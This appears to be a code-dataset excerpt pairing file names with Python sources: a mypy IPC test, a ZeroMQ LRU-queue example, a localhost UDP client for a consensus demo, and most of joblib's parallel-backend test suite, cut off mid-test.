| source (string, length 3–86) | python (string, length 75–1.04M) |
|---|---|
testipc.py
|
from unittest import TestCase, main
from multiprocessing import Process, Queue
from mypy.ipc import IPCClient, IPCServer
import pytest
import sys
import time
CONNECTION_NAME = 'dmypy-test-ipc'
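# The server helper below runs in a child process: it reports the connection
# name it actually bound via the Queue (so the client connects to the exact
# endpoint), keeps serving `msg` to each incoming connection until it reads a
# non-empty reply, then cleans up.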
def server(msg: str, q: 'Queue[str]') -> None:
server = IPCServer(CONNECTION_NAME)
q.put(server.connection_name)
data = b''
while not data:
with server:
server.write(msg.encode())
data = server.read()
server.cleanup()
class IPCTests(TestCase):
def test_transaction_large(self) -> None:
queue = Queue() # type: Queue[str]
msg = 't' * 200000 # longer than the max read size of 100_000
p = Process(target=server, args=(msg, queue), daemon=True)
p.start()
connection_name = queue.get()
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'test')
queue.close()
queue.join_thread()
p.join()
def test_connect_twice(self) -> None:
queue = Queue() # type: Queue[str]
msg = 'this is a test message'
p = Process(target=server, args=(msg, queue), daemon=True)
p.start()
connection_name = queue.get()
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'') # don't let the server hang up yet, we want to connect again.
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'test')
queue.close()
queue.join_thread()
p.join()
assert p.exitcode == 0
# Run test_connect_twice a lot, in the hopes of finding issues.
# This is really slow, so it is skipped, but can be enabled if
# needed to debug IPC issues.
@pytest.mark.skip
def test_connect_alot(self) -> None:
t0 = time.time()
for i in range(1000):
try:
print(i, 'start')
self.test_connect_twice()
finally:
t1 = time.time()
print(i, t1 - t0)
sys.stdout.flush()
t0 = t1
if __name__ == '__main__':
main()
|
lruqueue2.py
|
"""
Least-recently used (LRU) queue device
Clients and workers are shown here in-process
Author: Guillaume Aubert (gaubert) <guillaume(dot)aubert(at)gmail(dot)com>
"""
import threading
import time
import zmq
NBR_CLIENTS = 10
NBR_WORKERS = 3
def worker_thread(worker_url, context, i):
""" Worker using REQ socket to do LRU routing """
socket = context.socket(zmq.REQ)
identity = "Worker-%d" % (i)
socket.setsockopt(zmq.IDENTITY, identity) #set worker identity
socket.connect(worker_url)
# Tell the broker we are ready for work
socket.send("READY")
try:
while True:
[address, request] = socket.recv_multipart()
print("%s: %s\n" %(identity, request))
socket.send_multipart([address, "", "OK"])
except zmq.ZMQError as zerr:
# context terminated so quit silently
if zerr.strerror == 'Context was terminated':
return
else:
raise zerr
def client_thread(client_url, context, i):
""" Basic request-reply client using REQ socket """
socket = context.socket(zmq.REQ)
identity = "Client-%d" % (i)
socket.setsockopt(zmq.IDENTITY, identity) #Set client identity. Makes tracing easier
socket.connect(client_url)
# Send request, get reply
socket.send("HELLO")
reply = socket.recv()
print("%s: %s\n" % (identity, reply))
return
def main():
""" main method """
url_worker = "inproc://workers"
url_client = "inproc://clients"
client_nbr = NBR_CLIENTS
# Prepare our context and sockets
context = zmq.Context(1)
frontend = context.socket(zmq.XREP)
frontend.bind(url_client)
backend = context.socket(zmq.XREP)
backend.bind(url_worker)
# create workers and clients threads
for i in range(NBR_WORKERS):
thread = threading.Thread(target=worker_thread, args=(url_worker, context, i, ))
thread.start()
for i in range(NBR_CLIENTS):
thread_c = threading.Thread(target=client_thread, args=(url_client, context, i, ))
thread_c.start()
# Logic of LRU loop
# - Poll backend always, frontend only if 1+ worker ready
# - If worker replies, queue worker as ready and forward reply
# to client if necessary
# - If client requests, pop next worker and send request to it
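# Frame layouts seen on each ROUTER socket (a sketch inferred from the
# recv/send calls below):
#   backend  (worker REQ):  [worker_addr][''][READY]
#                           [worker_addr][''][client_addr][''][reply]
#   frontend (client REQ):  [client_addr][''][request]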
# Queue of available workers
available_workers = 0
workers_list = []
# init poller
poller = zmq.Poller()
# Always poll for worker activity on backend
poller.register(backend, zmq.POLLIN)
# Poll front-end only if we have available workers
poller.register(frontend, zmq.POLLIN)
while True:
socks = dict(poller.poll())
# Handle worker activity on backend
if (backend in socks and socks[backend] == zmq.POLLIN):
# Queue worker address for LRU routing
message = backend.recv_multipart()
assert available_workers < NBR_WORKERS
worker_addr = message[0]
# add worker back to the list of workers
available_workers += 1
workers_list.append(worker_addr)
# Second frame is empty
empty = message[1]
assert empty == ""
# Third frame is READY or else a client reply address
client_addr = message[2]
# If client reply, send rest back to frontend
if client_addr != "READY":
# Following frame is empty
empty = message[3]
assert empty == ""
reply = message[4]
frontend.send_multipart([client_addr, "", reply])
client_nbr -= 1
if client_nbr == 0:
break # Exit after N messages
# poll on frontend only if workers are available
if available_workers > 0:
if (frontend in socks and socks[frontend] == zmq.POLLIN):
# Now get next client request, route to LRU worker
# Client request is [address][empty][request]
[client_addr, empty, request ] = frontend.recv_multipart()
assert empty == ""
# Dequeue and drop the next worker address
available_workers -= 1
worker_id = workers_list.pop()
backend.send_multipart([worker_id, "", client_addr, request])
#out of infinite loop: do some housekeeping
time.sleep(1)
frontend.close()
backend.close()
context.term()
if __name__ == "__main__":
main()
|
client.py
|
# coding: utf-8
__author__ = 'zhenhang.sun@gmail.com'
__version__ = '1.0.0'
import time
import json
import socket
import random
from multiprocessing import Process
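# send() pushes client_append_entries requests over UDP to a randomly chosen
# node of a local three-node cluster (ports 10001-10003), while recv() listens
# on port 10000 for notifications that an entry has been committed.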
def send():
cs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
servers = [
('localhost', 10001),
('localhost', 10002),
('localhost', 10003)
]
while True:
addr = random.choice(servers)
data = {'type': 'client_append_entries', 'timestamp': int(time.time())}
print('send: ', data)
data = json.dumps(data).encode('utf-8')
cs.sendto(data, addr)
time.sleep(10)
def recv():
addr = ('localhost', 10000)
ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ss.bind(addr)
while True:
data, addr = ss.recvfrom(65535)
data = json.loads(data)
print('recv: ' + str(data['index']) + ' has been committed')
if __name__ == '__main__':
p1 = Process(target=send, name='send', daemon=True)
p1.start()
p2 = Process(target=recv, name='recv', daemon=True)
p2.start()
p1.join()
p2.join()
|
test_parallel.py
|
"""
Test the parallel module.
"""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2010-2011 Gael Varoquaux
# License: BSD Style, 3 clauses.
import os
import sys
import time
import mmap
import threading
from traceback import format_exception
from math import sqrt
from time import sleep
from pickle import PicklingError
from multiprocessing import TimeoutError
import pytest
import joblib
from joblib import parallel
from joblib import dump, load
from joblib.externals.loky import get_reusable_executor
from joblib.test.common import np, with_numpy
from joblib.test.common import with_multiprocessing
from joblib.testing import (parametrize, raises, check_subprocess_call,
skipif, SkipTest, warns)
from joblib._compat import PY3_OR_LATER, PY27
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from queue import Queue
except ImportError:
# Backward compat
from Queue import Queue
try:
import posix
except ImportError:
posix = None
try:
RecursionError
except NameError:
RecursionError = RuntimeError
try:
reload # Python 2
except NameError: # Python 3
from importlib import reload
try:
from ._openmp_test_helper.parallel_sum import parallel_sum
except ImportError:
parallel_sum = None
try:
import distributed
except ImportError:
distributed = None
from joblib._parallel_backends import SequentialBackend
from joblib._parallel_backends import ThreadingBackend
from joblib._parallel_backends import MultiprocessingBackend
from joblib._parallel_backends import ParallelBackendBase
from joblib._parallel_backends import LokyBackend
from joblib._parallel_backends import SafeFunction
from joblib.parallel import Parallel, delayed
from joblib.parallel import register_parallel_backend, parallel_backend
from joblib.parallel import effective_n_jobs, cpu_count
from joblib.parallel import mp, BACKENDS, DEFAULT_BACKEND, EXTERNAL_BACKENDS
from joblib.my_exceptions import JoblibException
from joblib.my_exceptions import TransportableException
from joblib.my_exceptions import JoblibValueError
from joblib.my_exceptions import WorkerInterrupt
ALL_VALID_BACKENDS = [None] + sorted(BACKENDS.keys())
# Add instances of backend classes deriving from ParallelBackendBase
ALL_VALID_BACKENDS += [BACKENDS[backend_str]() for backend_str in BACKENDS]
PROCESS_BACKENDS = ['multiprocessing', 'loky']
PARALLEL_BACKENDS = PROCESS_BACKENDS + ['threading']
if hasattr(mp, 'get_context'):
# Custom multiprocessing context in Python 3.4+
ALL_VALID_BACKENDS.append(mp.get_context('spawn'))
DefaultBackend = BACKENDS[DEFAULT_BACKEND]
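# Backends keep their worker pool under different private attributes
# (typically `_pool` for the multiprocessing/threading backends and `_workers`
# for loky); return whichever one is present, or None.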
def get_workers(backend):
return getattr(backend, '_pool', getattr(backend, '_workers', None))
def division(x, y):
return x / y
def square(x):
return x ** 2
class MyExceptionWithFinickyInit(Exception):
"""An exception class with non trivial __init__
"""
def __init__(self, a, b, c, d):
pass
def exception_raiser(x, custom_exception=False):
if x == 7:
raise (MyExceptionWithFinickyInit('a', 'b', 'c', 'd')
if custom_exception else ValueError)
return x
def interrupt_raiser(x):
time.sleep(.05)
raise KeyboardInterrupt
def f(x, y=0, z=0):
""" A module-level function so that it can be spawn with
multiprocessing.
"""
return x ** 2 + y + z
def _active_backend_type():
return type(parallel.get_active_backend()[0])
def parallel_func(inner_n_jobs, backend):
return Parallel(n_jobs=inner_n_jobs, backend=backend)(
delayed(square)(i) for i in range(3))
###############################################################################
def test_cpu_count():
assert cpu_count() > 0
def test_effective_n_jobs():
assert effective_n_jobs() > 0
@pytest.mark.parametrize(
"backend_n_jobs, expected_n_jobs",
[(3, 3), (-1, effective_n_jobs(n_jobs=-1)), (None, 1)],
ids=["positive-int", "negative-int", "None"]
)
@with_multiprocessing
def test_effective_n_jobs_None(backend_n_jobs, expected_n_jobs):
# check the number of effective jobs when `n_jobs=None`
# non-regression test for https://github.com/joblib/joblib/issues/984
with parallel_backend("threading", n_jobs=backend_n_jobs):
# when using a backend, the default number of jobs will be the one set
# in the backend
assert effective_n_jobs(n_jobs=None) == expected_n_jobs
# without any backend, None will default to a single job
assert effective_n_jobs(n_jobs=None) == 1
###############################################################################
# Test parallel
@parametrize('backend', ALL_VALID_BACKENDS)
@parametrize('n_jobs', [1, 2, -1, -2])
@parametrize('verbose', [2, 11, 100])
def test_simple_parallel(backend, n_jobs, verbose):
assert ([square(x) for x in range(5)] ==
Parallel(n_jobs=n_jobs, backend=backend,
verbose=verbose)(
delayed(square)(x) for x in range(5)))
@parametrize('backend', ALL_VALID_BACKENDS)
def test_main_thread_renamed_no_warning(backend, monkeypatch):
# Check that no default backend relies on the name of the main thread:
# https://github.com/joblib/joblib/issues/180#issuecomment-253266247
# Some programs use a different name for the main thread. This is the case
# for uWSGI apps for instance.
monkeypatch.setattr(target=threading.current_thread(), name='name',
value='some_new_name_for_the_main_thread')
with warns(None) as warninfo:
results = Parallel(n_jobs=2, backend=backend)(
delayed(square)(x) for x in range(3))
assert results == [0, 1, 4]
# Due to the default parameters of LokyBackend, there is a chance that
# warninfo catches Warnings from worker timeouts. We remove them if any exist.
warninfo = [w for w in warninfo if "worker timeout" not in str(w.message)]
# The multiprocessing backend will raise a warning when detecting that it is
# started from a non-main thread. Let's check that there is no false
# positive because of the name change.
assert len(warninfo) == 0
def _assert_warning_nested(backend, inner_n_jobs, expected):
with warns(None) as records:
parallel_func(backend=backend, inner_n_jobs=inner_n_jobs)
if expected:
# with threading, we might see more than one record
if len(records) > 0:
return 'backed parallel loops cannot' in records[0].message.args[0]
return False
else:
assert len(records) == 0
return True
@with_multiprocessing
@parametrize('parent_backend,child_backend,expected', [
('loky', 'multiprocessing', True), ('loky', 'loky', False),
('multiprocessing', 'multiprocessing', True),
('multiprocessing', 'loky', True),
('threading', 'multiprocessing', True),
('threading', 'loky', True),
])
def test_nested_parallel_warnings(parent_backend, child_backend, expected):
# no warnings if inner_n_jobs=1
Parallel(n_jobs=2, backend=parent_backend)(
delayed(_assert_warning_nested)(
backend=child_backend, inner_n_jobs=1,
expected=False)
for _ in range(5))
# warnings if inner_n_jobs != 1 and expected
res = Parallel(n_jobs=2, backend=parent_backend)(
delayed(_assert_warning_nested)(
backend=child_backend, inner_n_jobs=2,
expected=expected)
for _ in range(5))
# warning handling is not thread safe. One thread might see multiple
# warnings or no warning at all.
if parent_backend == "threading":
assert any(res)
else:
assert all(res)
@with_multiprocessing
@parametrize('backend', ['loky', 'multiprocessing', 'threading'])
def test_background_thread_parallelism(backend):
is_run_parallel = [False]
def background_thread(is_run_parallel):
with warns(None) as records:
Parallel(n_jobs=2)(
delayed(sleep)(.1) for _ in range(4))
print(len(records))
is_run_parallel[0] = len(records) == 0
t = threading.Thread(target=background_thread, args=(is_run_parallel,))
t.start()
t.join()
assert is_run_parallel[0]
def nested_loop(backend):
Parallel(n_jobs=2, backend=backend)(
delayed(square)(.01) for _ in range(2))
@parametrize('child_backend', BACKENDS)
@parametrize('parent_backend', BACKENDS)
def test_nested_loop(parent_backend, child_backend):
Parallel(n_jobs=2, backend=parent_backend)(
delayed(nested_loop)(child_backend) for _ in range(2))
def raise_exception(backend):
raise ValueError
def test_nested_loop_with_exception_with_loky():
with raises(ValueError):
with Parallel(n_jobs=2, backend="loky") as parallel:
parallel([delayed(nested_loop)("loky"),
delayed(raise_exception)("loky")])
def test_mutate_input_with_threads():
"""Input is mutable when using the threading backend"""
q = Queue(maxsize=5)
Parallel(n_jobs=2, backend="threading")(
delayed(q.put)(1) for _ in range(5))
assert q.full()
@parametrize('n_jobs', [1, 2, 3])
def test_parallel_kwargs(n_jobs):
"""Check the keyword argument processing of pmap."""
lst = range(10)
assert ([f(x, y=1) for x in lst] ==
Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst))
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_as_context_manager(backend):
lst = range(10)
expected = [f(x, y=1) for x in lst]
with Parallel(n_jobs=4, backend=backend) as p:
# Internally a pool instance has been eagerly created and is managed
# via the context manager protocol
managed_backend = p._backend
# We make call with the managed parallel object several times inside
# the managed block:
assert expected == p(delayed(f)(x, y=1) for x in lst)
assert expected == p(delayed(f)(x, y=1) for x in lst)
# Those calls have all used the same pool instance:
if mp is not None:
assert get_workers(managed_backend) is get_workers(p._backend)
# As soon as we exit the context manager block, the pool is terminated and
# no longer referenced from the parallel object:
if mp is not None:
assert get_workers(p._backend) is None
# It's still possible to use the parallel instance in non-managed mode:
assert expected == p(delayed(f)(x, y=1) for x in lst)
if mp is not None:
assert get_workers(p._backend) is None
@with_multiprocessing
def test_parallel_pickling():
""" Check that pmap captures the errors when it is passed an object
that cannot be pickled.
"""
class UnpicklableObject(object):
def __reduce__(self):
raise RuntimeError('123')
with raises(PicklingError, match=r"the task to send"):
Parallel(n_jobs=2)(delayed(id)(UnpicklableObject()) for _ in range(10))
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_timeout_success(backend):
# Check that timeout isn't thrown when function is fast enough
assert len(Parallel(n_jobs=2, backend=backend, timeout=10)(
delayed(sleep)(0.001) for x in range(10))) == 10
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_timeout_fail(backend):
# Check that timeout properly fails when function is too slow
with raises(TimeoutError):
Parallel(n_jobs=2, backend=backend, timeout=0.01)(
delayed(sleep)(10) for x in range(10))
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_error_capture(backend):
# Check that error are captured, and that correct exceptions
# are raised.
if mp is not None:
with raises(ZeroDivisionError):
Parallel(n_jobs=2, backend=backend)(
[delayed(division)(x, y)
for x, y in zip((0, 1), (1, 0))])
with raises(WorkerInterrupt):
Parallel(n_jobs=2, backend=backend)(
[delayed(interrupt_raiser)(x) for x in (1, 0)])
# Try again with the context manager API
with Parallel(n_jobs=2, backend=backend) as parallel:
assert get_workers(parallel._backend) is not None
original_workers = get_workers(parallel._backend)
with raises(ZeroDivisionError):
parallel([delayed(division)(x, y)
for x, y in zip((0, 1), (1, 0))])
# The managed pool should still be available and be in a working
# state despite the previously raised (and caught) exception
assert get_workers(parallel._backend) is not None
# The pool should have been interrupted and restarted:
assert get_workers(parallel._backend) is not original_workers
assert ([f(x, y=1) for x in range(10)] ==
parallel(delayed(f)(x, y=1) for x in range(10)))
original_workers = get_workers(parallel._backend)
with raises(WorkerInterrupt):
parallel([delayed(interrupt_raiser)(x) for x in (1, 0)])
# The pool should still be available despite the exception
assert get_workers(parallel._backend) is not None
# The pool should have been interrupted and restarted:
assert get_workers(parallel._backend) is not original_workers
assert ([f(x, y=1) for x in range(10)] ==
parallel(delayed(f)(x, y=1) for x in range(10)))
# Check that the inner pool has been terminated when exiting the
# context manager
assert get_workers(parallel._backend) is None
else:
with raises(KeyboardInterrupt):
Parallel(n_jobs=2)(
[delayed(interrupt_raiser)(x) for x in (1, 0)])
# wrapped exceptions should inherit from the class of the original
# exception to make it easy to catch them
with raises(ZeroDivisionError):
Parallel(n_jobs=2)(
[delayed(division)(x, y) for x, y in zip((0, 1), (1, 0))])
with raises(MyExceptionWithFinickyInit):
Parallel(n_jobs=2, verbose=0)(
(delayed(exception_raiser)(i, custom_exception=True)
for i in range(30)))
try:
# JoblibException wrapping is disabled in sequential mode:
Parallel(n_jobs=1)(
delayed(division)(x, y) for x, y in zip((0, 1), (1, 0)))
except Exception as ex:
assert not isinstance(ex, JoblibException)
else:
raise ValueError("The excepted error has not been raised.")
def consumer(queue, item):
queue.append('Consumed %s' % item)
@parametrize('backend', BACKENDS)
@parametrize('batch_size, expected_queue',
[(1, ['Produced 0', 'Consumed 0',
'Produced 1', 'Consumed 1',
'Produced 2', 'Consumed 2',
'Produced 3', 'Consumed 3',
'Produced 4', 'Consumed 4',
'Produced 5', 'Consumed 5']),
(4, [ # First Batch
'Produced 0', 'Produced 1', 'Produced 2', 'Produced 3',
'Consumed 0', 'Consumed 1', 'Consumed 2', 'Consumed 3',
# Second batch
'Produced 4', 'Produced 5', 'Consumed 4', 'Consumed 5'])])
def test_dispatch_one_job(backend, batch_size, expected_queue):
""" Test that with only one job, Parallel does act as a iterator.
"""
queue = list()
def producer():
for i in range(6):
queue.append('Produced %i' % i)
yield i
Parallel(n_jobs=1, batch_size=batch_size, backend=backend)(
delayed(consumer)(queue, x) for x in producer())
assert queue == expected_queue
assert len(queue) == 12
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_dispatch_multiprocessing(backend):
""" Check that using pre_dispatch Parallel does indeed dispatch items
lazily.
"""
manager = mp.Manager()
queue = manager.list()
def producer():
for i in range(6):
queue.append('Produced %i' % i)
yield i
Parallel(n_jobs=2, batch_size=1, pre_dispatch=3, backend=backend)(
delayed(consumer)(queue, 'any') for _ in producer())
queue_contents = list(queue)
assert queue_contents[0] == 'Produced 0'
# Only 3 tasks are pre-dispatched out of 6. The 4th task is dispatched only
# after any of the first 3 jobs have completed.
first_consumption_index = queue_contents[:4].index('Consumed any')
assert first_consumption_index > -1
produced_3_index = queue_contents.index('Produced 3') # 4th task produced
assert produced_3_index > first_consumption_index
assert len(queue) == 12
def test_batching_auto_threading():
# batching='auto' with the threading backend leaves the effective batch
# size to 1 (no batching) as it has been found to never be beneficial with
# this low-overhead backend.
with Parallel(n_jobs=2, batch_size='auto', backend='threading') as p:
p(delayed(id)(i) for i in range(5000)) # many very fast tasks
assert p._backend.compute_batch_size() == 1
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_batching_auto_subprocesses(backend):
with Parallel(n_jobs=2, batch_size='auto', backend=backend) as p:
p(delayed(id)(i) for i in range(5000)) # many very fast tasks
# It should be strictly larger than 1, but as we don't want heisenbug-style
# failures on clogged CI worker environments, be safe and only check that
# it's a strictly positive number.
assert p._backend.compute_batch_size() > 0
def test_exception_dispatch():
"""Make sure that exception raised during dispatch are indeed captured"""
with raises(ValueError):
Parallel(n_jobs=2, pre_dispatch=16, verbose=0)(
delayed(exception_raiser)(i) for i in range(30))
def nested_function_inner(i):
Parallel(n_jobs=2)(
delayed(exception_raiser)(j) for j in range(30))
def nested_function_outer(i):
Parallel(n_jobs=2)(
delayed(nested_function_inner)(j) for j in range(30))
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_nested_exception_dispatch(backend):
"""Ensure errors for nested joblib cases gets propagated
For Python 2.7, the TransportableException wrapping and unwrapping should
preserve the traceback information of the inner function calls.
For Python 3, we rely on the built-in __cause__ system that already
report this kind of information to the user.
"""
if PY27 and backend == 'multiprocessing':
raise SkipTest("Nested parallel calls can deadlock with the python 2.7"
"multiprocessing backend.")
with raises(ValueError) as excinfo:
Parallel(n_jobs=2, backend=backend)(
delayed(nested_function_outer)(i) for i in range(30))
# Check that important information such as function names are visible
# in the final error message reported to the user
report_lines = format_exception(excinfo.type, excinfo.value, excinfo.tb)
report = "".join(report_lines)
assert 'nested_function_outer' in report
assert 'nested_function_inner' in report
assert 'exception_raiser' in report
if PY3_OR_LATER:
# Under Python 3, there is no need for exception wrapping as the
# exception raised in a worker process is transportable by default and
# preserves the necessary information via the `__cause__` attribute.
assert type(excinfo.value) is ValueError
else:
# The wrapping mechanism used to make exception of Python2.7
# transportable does not create a JoblibJoblibJoblibValueError
# despite the 3 nested parallel calls.
assert type(excinfo.value) is JoblibValueError
def _reload_joblib():
# Retrieve the path of the parallel module in a robust way
joblib_path = Parallel.__module__.split(os.sep)
joblib_path = joblib_path[:1]
joblib_path.append('parallel.py')
joblib_path = '/'.join(joblib_path)
module = __import__(joblib_path)
# Reload the module. This should trigger a fail
reload(module)
def test_multiple_spawning():
# Test that attempting to launch a new Python after spawned
# subprocesses will raise an error, to avoid infinite loops on
# systems that do not support fork
if not int(os.environ.get('JOBLIB_MULTIPROCESSING', 1)):
raise SkipTest()
with raises(ImportError):
Parallel(n_jobs=2, pre_dispatch='all')(
[delayed(_reload_joblib)() for i in range(10)])
class FakeParallelBackend(SequentialBackend):
"""Pretends to run concurrently while running sequentially."""
def configure(self, n_jobs=1, parallel=None, **backend_args):
self.n_jobs = self.effective_n_jobs(n_jobs)
self.parallel = parallel
return n_jobs
def effective_n_jobs(self, n_jobs=1):
if n_jobs < 0:
n_jobs = max(mp.cpu_count() + 1 + n_jobs, 1)
return n_jobs
def test_invalid_backend():
with raises(ValueError):
Parallel(backend='unit-testing')
@parametrize('backend', ALL_VALID_BACKENDS)
def test_invalid_njobs(backend):
with raises(ValueError) as excinfo:
Parallel(n_jobs=0, backend=backend)._initialize_backend()
assert "n_jobs == 0 in Parallel has no meaning" in str(excinfo.value)
def test_register_parallel_backend():
try:
register_parallel_backend("test_backend", FakeParallelBackend)
assert "test_backend" in BACKENDS
assert BACKENDS["test_backend"] == FakeParallelBackend
finally:
del BACKENDS["test_backend"]
def test_overwrite_default_backend():
assert _active_backend_type() == DefaultBackend
try:
register_parallel_backend("threading", BACKENDS["threading"],
make_default=True)
assert _active_backend_type() == ThreadingBackend
finally:
# Restore the global default manually
parallel.DEFAULT_BACKEND = DEFAULT_BACKEND
assert _active_backend_type() == DefaultBackend
def check_backend_context_manager(backend_name):
with parallel_backend(backend_name, n_jobs=3):
active_backend, active_n_jobs = parallel.get_active_backend()
assert active_n_jobs == 3
assert effective_n_jobs(3) == 3
p = Parallel()
assert p.n_jobs == 3
if backend_name == 'multiprocessing':
assert type(active_backend) == MultiprocessingBackend
assert type(p._backend) == MultiprocessingBackend
elif backend_name == 'loky':
assert type(active_backend) == LokyBackend
assert type(p._backend) == LokyBackend
elif backend_name == 'threading':
assert type(active_backend) == ThreadingBackend
assert type(p._backend) == ThreadingBackend
elif backend_name.startswith('test_'):
assert type(active_backend) == FakeParallelBackend
assert type(p._backend) == FakeParallelBackend
all_backends_for_context_manager = PARALLEL_BACKENDS[:]
all_backends_for_context_manager.extend(
['test_backend_%d' % i for i in range(3)]
)
@with_multiprocessing
@parametrize('backend', all_backends_for_context_manager)
def test_backend_context_manager(monkeypatch, backend):
if backend not in BACKENDS:
monkeypatch.setitem(BACKENDS, backend, FakeParallelBackend)
assert _active_backend_type() == DefaultBackend
# check that it is possible to switch parallel backends sequentially
check_backend_context_manager(backend)
# The default backend is restored
assert _active_backend_type() == DefaultBackend
# Check that context manager switching is thread safe:
Parallel(n_jobs=2, backend='threading')(
delayed(check_backend_context_manager)(b)
for b in all_backends_for_context_manager if not b)
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
class ParameterizedParallelBackend(SequentialBackend):
"""Pretends to run conncurrently while running sequentially."""
def __init__(self, param=None):
if param is None:
raise ValueError('param should not be None')
self.param = param
def test_parameterized_backend_context_manager(monkeypatch):
monkeypatch.setitem(BACKENDS, 'param_backend',
ParameterizedParallelBackend)
assert _active_backend_type() == DefaultBackend
with parallel_backend('param_backend', param=42, n_jobs=3):
active_backend, active_n_jobs = parallel.get_active_backend()
assert type(active_backend) == ParameterizedParallelBackend
assert active_backend.param == 42
assert active_n_jobs == 3
p = Parallel()
assert p.n_jobs == 3
assert p._backend is active_backend
results = p(delayed(sqrt)(i) for i in range(5))
assert results == [sqrt(i) for i in range(5)]
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
def test_directly_parameterized_backend_context_manager():
assert _active_backend_type() == DefaultBackend
# Check that it's possible to pass a backend instance directly,
# without registration
with parallel_backend(ParameterizedParallelBackend(param=43), n_jobs=5):
active_backend, active_n_jobs = parallel.get_active_backend()
assert type(active_backend) == ParameterizedParallelBackend
assert active_backend.param == 43
assert active_n_jobs == 5
p = Parallel()
assert p.n_jobs == 5
assert p._backend is active_backend
results = p(delayed(sqrt)(i) for i in range(5))
assert results == [sqrt(i) for i in range(5)]
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
def sleep_and_return_pid():
sleep(.1)
return os.getpid()
def get_nested_pids():
assert _active_backend_type() == ThreadingBackend
# Assert that the nested backend does not change the default number of
# jobs used in Parallel
assert Parallel()._effective_n_jobs() == 1
# Assert that the tasks are running only on one process
return Parallel(n_jobs=2)(delayed(sleep_and_return_pid)()
for _ in range(2))
class MyBackend(joblib._parallel_backends.LokyBackend):
"""Backend to test backward compatibility with older backends"""
def get_nested_backend(self, ):
# Older backends only return a backend, without n_jobs indications.
return super(MyBackend, self).get_nested_backend()[0]
register_parallel_backend('back_compat_backend', MyBackend)
@with_multiprocessing
@parametrize('backend', ['threading', 'loky', 'multiprocessing',
'back_compat_backend'])
def test_nested_backend_context_manager(backend):
# Check that by default, nested parallel calls will always use the
# ThreadingBackend
with parallel_backend(backend):
pid_groups = Parallel(n_jobs=2)(
delayed(get_nested_pids)()
for _ in range(10)
)
for pid_group in pid_groups:
assert len(set(pid_group)) == 1
@with_multiprocessing
@parametrize('n_jobs', [2, -1, None])
@parametrize('backend', PARALLEL_BACKENDS)
def test_nested_backend_in_sequential(backend, n_jobs):
# Check that by default, nested parallel calls will always use the
# ThreadingBackend
def check_nested_backend(expected_backend_type, expected_n_job):
# Assert that the sequential backend at top level does not change the
# backend for nested calls.
assert _active_backend_type() == BACKENDS[expected_backend_type]
# Assert that the nested backend in SequentialBackend does not change
# the default number of jobs used in Parallel
expected_n_job = effective_n_jobs(expected_n_job)
assert Parallel()._effective_n_jobs() == expected_n_job
Parallel(n_jobs=1)(
delayed(check_nested_backend)('loky', 1)
for _ in range(10)
)
with parallel_backend(backend, n_jobs=n_jobs):
Parallel(n_jobs=1)(
delayed(check_nested_backend)(backend, n_jobs)
for _ in range(10)
)
def check_nesting_level(inner_backend, expected_level):
with parallel_backend(inner_backend) as (backend, n_jobs):
assert backend.nesting_level == expected_level
@with_multiprocessing
@parametrize('outer_backend', PARALLEL_BACKENDS)
@parametrize('inner_backend', PARALLEL_BACKENDS)
def test_backend_nesting_level(outer_backend, inner_backend):
# Check that the nesting level for the backend is correctly set
check_nesting_level(outer_backend, 0)
Parallel(n_jobs=2, backend=outer_backend)(
delayed(check_nesting_level)(inner_backend, 1)
for _ in range(10)
)
with parallel_backend(inner_backend, n_jobs=2):
Parallel()(delayed(check_nesting_level)(inner_backend, 1)
for _ in range(10))
@with_multiprocessing
def test_retrieval_context():
import contextlib
class MyBackend(ThreadingBackend):
i = 0
@contextlib.contextmanager
def retrieval_context(self):
self.i += 1
yield
register_parallel_backend("retrieval", MyBackend)
def nested_call(n):
return Parallel(n_jobs=2)(delayed(id)(i) for i in range(n))
with parallel_backend("retrieval") as (ba, _):
Parallel(n_jobs=2)(
delayed(nested_call, check_pickle=False)(i)
for i in range(5)
)
assert ba.i == 1
###############################################################################
# Test helpers
def test_joblib_exception():
# Smoke-test the custom exception
e = JoblibException('foobar')
# Test the repr
repr(e)
# Test the pickle
pickle.dumps(e)
def test_safe_function():
safe_division = SafeFunction(division)
if PY3_OR_LATER:
with raises(ZeroDivisionError):
safe_division(1, 0)
else:
# Under Python 2.7, exceptions are wrapped with a special wrapper to
# preserve runtime information of the worker environment. Python 3 does
# not need this as it preserves the traceback information by default.
with raises(TransportableException) as excinfo:
safe_division(1, 0)
assert isinstance(excinfo.value.unwrap(), ZeroDivisionError)
safe_interrupt = SafeFunction(interrupt_raiser)
with raises(WorkerInterrupt):
safe_interrupt('x')
@parametrize('batch_size', [0, -1, 1.42])
def test_invalid_batch_size(batch_size):
with raises(ValueError):
Parallel(batch_size=batch_size)
@parametrize('n_tasks, n_jobs, pre_dispatch, batch_size',
[(2, 2, 'all', 'auto'),
(2, 2, 'n_jobs', 'auto'),
(10, 2, 'n_jobs', 'auto'),
(517, 2, 'n_jobs', 'auto'),
(10, 2, 'n_jobs', 'auto'),
(10, 4, 'n_jobs', 'auto'),
(200, 12, 'n_jobs', 'auto'),
(25, 12, '2 * n_jobs', 1),
(250, 12, 'all', 1),
(250, 12, '2 * n_jobs', 7),
(200, 12, '2 * n_jobs', 'auto')])
def test_dispatch_race_condition(n_tasks, n_jobs, pre_dispatch, batch_size):
# Check that using (async-)dispatch does not yield a race condition on the
# iterable generator that is not thread-safe natively.
# This is a non-regression test for the "Pool seems closed" class of error
